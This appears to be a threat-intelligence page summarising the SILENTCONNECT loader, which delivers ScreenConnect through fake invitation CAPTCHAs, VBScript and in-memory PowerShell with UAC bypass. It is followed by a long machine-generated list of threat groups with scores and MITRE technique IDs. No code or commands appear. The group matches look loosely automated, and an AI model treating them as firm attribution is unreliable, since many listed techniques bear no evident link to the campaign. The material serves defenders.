Trusted Design

From Invitation to Infection: How SILENTCONNECT Delivers ScreenConnect

概要

A newly discovered loader called SILENTCONNECT is being used in active campaigns to silently install ScreenConnect, a remote monitoring and management tool, on victim machines. The infection chain begins with users being redirected to a Cloudflare Turnstile CAPTCHA page disguised as a digital invitation. Upon clicking, a VBScript file is downloaded, which retrieves and executes C# source code in memory using PowerShell. SILENTCONNECT employs various evasion techniques, including PEB masquerading and UAC bypass. The campaigns leverage trusted hosting providers like Google Drive and Cloudflare, and abuse living-off-the-land binaries. The loader has been active since March 2025 and poses a significant threat due to its stealthy nature and effectiveness.

Created: 2026-03-20

Indicators

類似Pulses

類似するPulseは見つかりませんでした。

このPulseに関連する脅威アクター (事実ベース)

Dragonfly

Score: 47.16
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1584.008 - Network Devices
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1059.009 - Cloud API
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1175 - Component Object Model and Distributed COM
  • T1219.001 - IDE Tunneling
  • T1657 - Financial Theft
  • T1497.002 - User Activity Based Checks
  • T1041 - Exfiltration Over C2 Channel
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1546.016 - Installer Packages
  • T1134 - Access Token Manipulation
  • T1547.013 - XDG Autostart Entries
  • T1548.006 - TCC Manipulation
MITREへのリンク →

BRONZE BUTLER

Score: 34.62
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1568.002 - Domain Generation Algorithms
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1219.001 - IDE Tunneling
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1218.010 - Regsvr32
  • T1562.011 - Spoof Security Alerting
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1134 - Access Token Manipulation
  • T1159 - Launch Agent
  • T1547.013 - XDG Autostart Entries
  • T1008 - Fallback Channels
MITREへのリンク →

Gamaredon Group

Score: 70.12
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1087.002 - Domain Account
  • T1562.009 - Safe Mode Boot
  • T1547.012 - Print Processors
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1684 - Social Engineering
  • T1205 - Traffic Signaling
  • T1059.009 - Cloud API
  • T1045 - Software Packing
  • T1175 - Component Object Model and Distributed COM
  • T1219.001 - IDE Tunneling
  • T1612 - Build Image on Host
  • T1218.012 - Verclsid
  • T1608 - Stage Capabilities
  • T1608.005 - Link Target
  • T1606.001 - Web Cookies
  • T1497.002 - User Activity Based Checks
  • T1554 - Compromise Host Software Binary
  • T1055.014 - VDSO Hijacking
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1061 - Graphical User Interface
  • T1059.011 - Lua
  • T1547.002 - Authentication Package
  • T1059.013 - Container CLI/API
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
MITREへのリンク →

OilRig

Score: 62.49
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1562.009 - Safe Mode Boot
  • T1003.007 - Proc Filesystem
  • T1574.014 - AppDomainManager
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1005 - Data from Local System
  • T1586.002 - Email Accounts
  • T1558 - Steal or Forge Kerberos Tickets
  • T1009 - Binary Padding
  • T1059.009 - Cloud API
  • T1562.012 - Disable or Modify Linux Audit System
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1051 - Shared Webroot
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1592.002 - Software
  • T1556.009 - Conditional Access Policies
  • T1027.010 - Command Obfuscation
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
  • T1547.008 - LSASS Driver
MITREへのリンク →

APT28

Score: 60.11
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1685.001 - Disable or Modify Windows Event Log
  • T1206 - Sudo Caching
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1555.003 - Credentials from Web Browsers
  • T1027.016 - Junk Code Insertion
  • T1547.011 - Plist Modification
  • T1175 - Component Object Model and Distributed COM
  • T1219.001 - IDE Tunneling
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking
  • T1547.002 - Authentication Package
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1146 - Clear Command History
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
  • T1548.006 - TCC Manipulation
  • T1027.018 - Invisible Unicode
  • T1566.003 - Spearphishing via Service
MITREへのリンク →

MoustachedBouncer

Score: 5.43
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1045 - Software Packing
  • T1497.002 - User Activity Based Checks
MITREへのリンク →

GOLD SOUTHFIELD

Score: 7.15
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1140 - Deobfuscate/Decode Files or Information
  • T1586.002 - Email Accounts
  • T1497.002 - User Activity Based Checks
MITREへのリンク →

APT42

Score: 21.84
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1091 - Replication Through Removable Media
  • T1583.001 - Domains
  • T1059.009 - Cloud API
  • T1562.012 - Disable or Modify Linux Audit System
  • T1590.006 - Network Security Appliances
  • T1175 - Component Object Model and Distributed COM
  • T1612 - Build Image on Host
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1027.010 - Command Obfuscation
MITREへのリンク →

Magic Hound

Score: 53.22
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1036.009 - Break Process Trees
  • T1140 - Deobfuscate/Decode Files or Information
  • T1547.005 - Security Support Provider
  • T1009 - Binary Padding
  • T1059.009 - Cloud API
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1683 - Generate Content
  • T1187 - Forced Authentication
  • T1547.002 - Authentication Package
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
  • T1547.008 - LSASS Driver
MITREへのリンク →

MuddyWater

Score: 65.00
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1568.002 - Domain Generation Algorithms
  • T1206 - Sudo Caching
  • T1087.002 - Domain Account
  • T1547.012 - Print Processors
  • T1089 - Disabling Security Tools
  • T1059.010 - AutoHotKey & AutoIT
  • T1140 - Deobfuscate/Decode Files or Information
  • T1586.002 - Email Accounts
  • T1518.002 - Backup Software Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1051 - Shared Webroot
  • T1218.012 - Verclsid
  • T1059.008 - Network Device CLI
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1547.002 - Authentication Package
  • T1218.010 - Regsvr32
  • T1562.011 - Spoof Security Alerting
  • T1059.013 - Container CLI/API
  • T1027.010 - Command Obfuscation
  • T1159 - Launch Agent
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
MITREへのリンク →

Winter Vivern

Score: 24.20
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1059.010 - AutoHotKey & AutoIT
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1548 - Abuse Elevation Control Mechanism
  • T1175 - Component Object Model and Distributed COM
  • T1219.001 - IDE Tunneling
  • T1497.002 - User Activity Based Checks
  • T1218.001 - Compiled HTML File
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
MITREへのリンク →

Silence

Score: 19.30
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1087.002 - Domain Account
  • T1684 - Social Engineering
  • T1059.009 - Cloud API
  • T1547.011 - Plist Modification
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1027.010 - Command Obfuscation
  • T1134 - Access Token Manipulation
  • T1547.013 - XDG Autostart Entries
  • T1027.007 - Dynamic API Resolution
MITREへのリンク →

Volt Typhoon

Score: 70.60
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1685.001 - Disable or Modify Windows Event Log
  • T1562.009 - Safe Mode Boot
  • T1003.007 - Proc Filesystem
  • T1556.002 - Password Filter DLL
  • T1176 - Software Extensions
  • T1059.010 - AutoHotKey & AutoIT
  • T1140 - Deobfuscate/Decode Files or Information
  • T1070.008 - Clear Mailbox Data
  • T1547.005 - Security Support Provider
  • T1059.009 - Cloud API
  • T1562.012 - Disable or Modify Linux Audit System
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1049 - System Network Connections Discovery
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1488 - Disk Content Wipe
  • T1546.016 - Installer Packages
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1159 - Launch Agent
  • T1547.013 - XDG Autostart Entries
  • T1574.002 - DLL Side-Loading
  • T1548.006 - TCC Manipulation
  • T1569.002 - Service Execution
MITREへのリンク →

APT39

Score: 40.07
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1087.002 - Domain Account
  • T1059.010 - AutoHotKey & AutoIT
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1547.011 - Plist Modification
  • T1219.001 - IDE Tunneling
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking
  • T1547.002 - Authentication Package
  • T1001.003 - Protocol or Service Impersonation
  • T1564.007 - VBA Stomping
  • T1027.010 - Command Obfuscation
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
  • T1027.007 - Dynamic API Resolution
  • T1569.002 - Service Execution
MITREへのリンク →

Kimsuky

Score: 97.45
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1037 - Boot or Logon Initialization Scripts
  • T1033 - System Owner/User Discovery
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1140 - Deobfuscate/Decode Files or Information
  • T1684 - Social Engineering
  • T1205 - Traffic Signaling
  • T1009 - Binary Padding
  • T1059.009 - Cloud API
  • T1562.012 - Disable or Modify Linux Audit System
  • T1555.003 - Credentials from Web Browsers
  • T1557.003 - DHCP Spoofing
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1051 - Shared Webroot
  • T1218.012 - Verclsid
  • T1552.003 - Shell History
  • T1608 - Stage Capabilities
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1041 - Exfiltration Over C2 Channel
  • T1055.014 - VDSO Hijacking
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1059.011 - Lua
  • T1027.014 - Polymorphic Code
  • T1690 - Prevent Command History Logging
  • T1547.002 - Authentication Package
  • T1656 - Impersonation
  • T1565.002 - Transmitted Data Manipulation
  • T1027.010 - Command Obfuscation
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
  • T1003.003 - NTDS
  • T1008 - Fallback Channels
MITREへのリンク →

Dark Caracal

Score: 8.66
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1087.002 - Domain Account
  • T1219.001 - IDE Tunneling
  • T1059.012 - Hypervisor CLI
  • T1547.008 - LSASS Driver
MITREへのリンク →

FIN7

Score: 54.85
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1606.002 - SAML Tokens
  • T1206 - Sudo Caching
  • T1087.002 - Domain Account
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1140 - Deobfuscate/Decode Files or Information
  • T1586.002 - Email Accounts
  • T1205 - Traffic Signaling
  • T1009 - Binary Padding
  • T1011.001 - Exfiltration Over Bluetooth
  • T1218.012 - Verclsid
  • T1584.005 - Botnet
  • T1608.005 - Link Target
  • T1564.002 - Hidden Users
  • T1497.002 - User Activity Based Checks
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1547.002 - Authentication Package
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
  • T1027.007 - Dynamic API Resolution
MITREへのリンク →

Mustang Panda

Score: 71.89
Matched TTPs:
  • T1037 - Boot or Logon Initialization Scripts
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1089 - Disabling Security Tools
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1555.003 - Credentials from Web Browsers
  • T1136.001 - Local Account
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1612 - Build Image on Host
  • T1218.012 - Verclsid
  • T1569.001 - Launchctl
  • T1608 - Stage Capabilities
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1169 - Sudo
  • T1199 - Trusted Relationship
  • T1136.003 - Cloud Account
  • T1059.011 - Lua
  • T1218.010 - Regsvr32
  • T1565.002 - Transmitted Data Manipulation
  • T1027.010 - Command Obfuscation
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1159 - Launch Agent
  • T1547.013 - XDG Autostart Entries
  • T1055.005 - Thread Local Storage
  • T1548.006 - TCC Manipulation
  • T1027.018 - Invisible Unicode
MITREへのリンク →

Sea Turtle

Score: 28.00
Matched TTPs:
  • T1037 - Boot or Logon Initialization Scripts
  • T1033 - System Owner/User Discovery
  • T1499.003 - Application Exhaustion Flood
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1175 - Component Object Model and Distributed COM
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1137.004 - Outlook Home Page
  • T1059.013 - Container CLI/API
MITREへのリンク →

Ember Bear

Score: 58.22
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1564.008 - Email Hiding Rules
  • T1584.008 - Network Devices
  • T1005 - Data from Local System
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1059.009 - Cloud API
  • T1555.003 - Credentials from Web Browsers
  • T1027.016 - Junk Code Insertion
  • T1136.002 - Domain Account
  • T1175 - Component Object Model and Distributed COM
  • T1051 - Shared Webroot
  • T1497.002 - User Activity Based Checks
  • T1059.001 - PowerShell
  • T1097 - Pass the Ticket
  • T1597 - Search Closed Sources
  • T1218.010 - Regsvr32
  • T1656 - Impersonation
  • T1519 - Emond
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1668 - Exclusive Control
  • T1003.003 - NTDS
MITREへのリンク →

Indrik Spider

Score: 27.93
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1003.007 - Proc Filesystem
  • T1059.009 - Cloud API
  • T1574.008 - Path Interception by Search Order Hijacking
  • T1051 - Shared Webroot
  • T1497.002 - User Activity Based Checks
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1546.016 - Installer Packages
  • T1134 - Access Token Manipulation
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Agrius

Score: 22.99
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1584.008 - Network Devices
  • T1059.010 - AutoHotKey & AutoIT
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1555.003 - Credentials from Web Browsers
  • T1027.016 - Junk Code Insertion
  • T1097 - Pass the Ticket
  • T1597 - Search Closed Sources
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
MITREへのリンク →

Contagious Interview

Score: 55.46
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1044 - File System Permissions Weakness
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1547.005 - Security Support Provider
  • T1045 - Software Packing
  • T1175 - Component Object Model and Distributed COM
  • T1219.001 - IDE Tunneling
  • T1552.003 - Shell History
  • T1608.005 - Link Target
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1690 - Prevent Command History Logging
  • T1656 - Impersonation
  • T1059.006 - Python
  • T1565.002 - Transmitted Data Manipulation
  • T1027.010 - Command Obfuscation
  • T1221 - Template Injection
  • T1027.018 - Invisible Unicode
  • T1547.008 - LSASS Driver
MITREへのリンク →

Sandworm Team

Score: 70.74
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1564.008 - Email Hiding Rules
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1005 - Data from Local System
  • T1140 - Deobfuscate/Decode Files or Information
  • T1586.002 - Email Accounts
  • T1558 - Steal or Forge Kerberos Tickets
  • T1562.012 - Disable or Modify Linux Audit System
  • T1555.003 - Credentials from Web Browsers
  • T1557.003 - DHCP Spoofing
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1049 - System Network Connections Discovery
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1059.011 - Lua
  • T1027 - Obfuscated Files or Information
  • T1187 - Forced Authentication
  • T1547.002 - Authentication Package
  • T1218.010 - Regsvr32
  • T1075 - Pass the Hash
  • T1027.010 - Command Obfuscation
  • T1546.016 - Installer Packages
  • T1134 - Access Token Manipulation
  • T1547.013 - XDG Autostart Entries
  • T1548.006 - TCC Manipulation
  • T1027.018 - Invisible Unicode
MITREへのリンク →

Star Blizzard

Score: 17.08
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1547.005 - Security Support Provider
  • T1657 - Financial Theft
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
MITREへのリンク →

Lazarus Group

Score: 74.92
Matched TTPs:
  • T1132.001 - Standard Encoding
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1059.010 - AutoHotKey & AutoIT
  • T1070.008 - Clear Mailbox Data
  • T1205 - Traffic Signaling
  • T1009 - Binary Padding
  • T1027.016 - Junk Code Insertion
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1059.008 - Network Device CLI
  • T1608.005 - Link Target
  • T1606.001 - Web Cookies
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1069.001 - Local Groups
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1174 - Password Filter DLL
  • T1547.002 - Authentication Package
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1546.016 - Installer Packages
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
  • T1055.005 - Thread Local Storage
  • T1547.008 - LSASS Driver
  • T1569.002 - Service Execution
MITREへのリンク →

TA577

Score: 5.20
Matched TTPs:
  • T1132.001 - Standard Encoding
  • T1027.018 - Invisible Unicode
MITREへのリンク →

Moonstone Sleet

Score: 27.05
Matched TTPs:
  • T1132.001 - Standard Encoding
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1590.006 - Network Security Appliances
  • T1175 - Component Object Model and Distributed COM
  • T1059.011 - Lua
  • T1027 - Obfuscated Files or Information
  • T1547.013 - XDG Autostart Entries
  • T1027.007 - Dynamic API Resolution
  • T1547.008 - LSASS Driver
MITREへのリンク →

APT32

Score: 55.24
Matched TTPs:
  • T1110.001 - Password Guessing
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1089 - Disabling Security Tools
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1684 - Social Engineering
  • T1547.005 - Security Support Provider
  • T1059.009 - Cloud API
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1612 - Build Image on Host
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1027.014 - Polymorphic Code
  • T1174 - Password Filter DLL
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
  • T1027.007 - Dynamic API Resolution
MITREへのリンク →

Turla

Score: 63.31
Matched TTPs:
  • T1014 - Rootkit
  • T1606.002 - SAML Tokens
  • T1003.007 - Proc Filesystem
  • T1176 - Software Extensions
  • T1059.010 - AutoHotKey & AutoIT
  • T1684 - Social Engineering
  • T1059.009 - Cloud API
  • T1003.001 - LSASS Memory
  • T1590.006 - Network Security Appliances
  • T1045 - Software Packing
  • T1136.002 - Domain Account
  • T1219.001 - IDE Tunneling
  • T1612 - Build Image on Host
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1097 - Pass the Ticket
  • T1597 - Search Closed Sources
  • T1218.001 - Compiled HTML File
  • T1547.002 - Authentication Package
  • T1556.009 - Conditional Access Policies
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1546.016 - Installer Packages
  • T1134 - Access Token Manipulation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
  • T1569.002 - Service Execution
MITREへのリンク →

APT38

Score: 48.10
Matched TTPs:
  • T1568.002 - Domain Generation Algorithms
  • T1087.002 - Domain Account
  • T1685.002 - Disable or Modify Cloud Log
  • T1059.010 - AutoHotKey & AutoIT
  • T1684 - Social Engineering
  • T1009 - Binary Padding
  • T1059.009 - Cloud API
  • T1555.003 - Credentials from Web Browsers
  • T1219.001 - IDE Tunneling
  • T1138 - Application Shimming
  • T1218.012 - Verclsid
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1097 - Pass the Ticket
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1174 - Password Filter DLL
  • T1493 - Transmitted Data Manipulation
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
  • T1027.007 - Dynamic API Resolution
MITREへのリンク →

Evilnum

Score: 12.99
Matched TTPs:
  • T1568.002 - Domain Generation Algorithms
  • T1562.009 - Safe Mode Boot
  • T1089 - Disabling Security Tools
  • T1565.002 - Transmitted Data Manipulation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
MITREへのリンク →

APT37

Score: 23.95
Matched TTPs:
  • T1568.002 - Domain Generation Algorithms
  • T1206 - Sudo Caching
  • T1087.002 - Domain Account
  • T1684 - Social Engineering
  • T1562.012 - Disable or Modify Linux Audit System
  • T1059.011 - Lua
  • T1547.002 - Authentication Package
  • T1218.010 - Regsvr32
  • T1562.011 - Spoof Security Alerting
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Cobalt Group

Score: 31.20
Matched TTPs:
  • T1568.002 - Domain Generation Algorithms
  • T1206 - Sudo Caching
  • T1087.002 - Domain Account
  • T1586.002 - Email Accounts
  • T1684 - Social Engineering
  • T1518.002 - Backup Software Discovery
  • T1598.004 - Spearphishing Voice
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1027.014 - Polymorphic Code
  • T1218.010 - Regsvr32
  • T1027.010 - Command Obfuscation
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
MITREへのリンク →

Earth Lusca

Score: 50.78
Matched TTPs:
  • T1568.002 - Domain Generation Algorithms
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1140 - Deobfuscate/Decode Files or Information
  • T1059.009 - Cloud API
  • T1557.003 - DHCP Spoofing
  • T1590.006 - Network Security Appliances
  • T1045 - Software Packing
  • T1136.002 - Domain Account
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1218.001 - Compiled HTML File
  • T1059.011 - Lua
  • T1562.011 - Spoof Security Alerting
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1546.016 - Installer Packages
  • T1134 - Access Token Manipulation
  • T1027.018 - Invisible Unicode
MITREへのリンク →

Threat Group-3390

Score: 35.23
Matched TTPs:
  • T1568.002 - Domain Generation Algorithms
  • T1584.008 - Network Devices
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1140 - Deobfuscate/Decode Files or Information
  • T1218.003 - CMSTP
  • T1059.009 - Cloud API
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1497.002 - User Activity Based Checks
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Patchwork

Score: 30.83
Matched TTPs:
  • T1568.002 - Domain Generation Algorithms
  • T1206 - Sudo Caching
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1089 - Disabling Security Tools
  • T1059.009 - Cloud API
  • T1562.012 - Disable or Modify Linux Audit System
  • T1219.001 - IDE Tunneling
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1001.003 - Protocol or Service Impersonation
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
  • T1008 - Fallback Channels
MITREへのリンク →

Medusa Group

Score: 48.60
Matched TTPs:
  • T1568.002 - Domain Generation Algorithms
  • T1547.012 - Print Processors
  • T1140 - Deobfuscate/Decode Files or Information
  • T1586.002 - Email Accounts
  • T1218.003 - CMSTP
  • T1009 - Binary Padding
  • T1059.009 - Cloud API
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1552.003 - Shell History
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1598 - Phishing for Information
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
  • T1548.006 - TCC Manipulation
  • T1027.007 - Dynamic API Resolution
MITREへのリンク →

APT29

Score: 62.87
Matched TTPs:
  • T1568.002 - Domain Generation Algorithms
  • T1584.008 - Network Devices
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1202 - Indirect Command Execution
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1027.016 - Junk Code Insertion
  • T1547.011 - Plist Modification
  • T1177 - LSASS Driver
  • T1138 - Application Shimming
  • T1218.012 - Verclsid
  • T1218.005 - Mshta
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
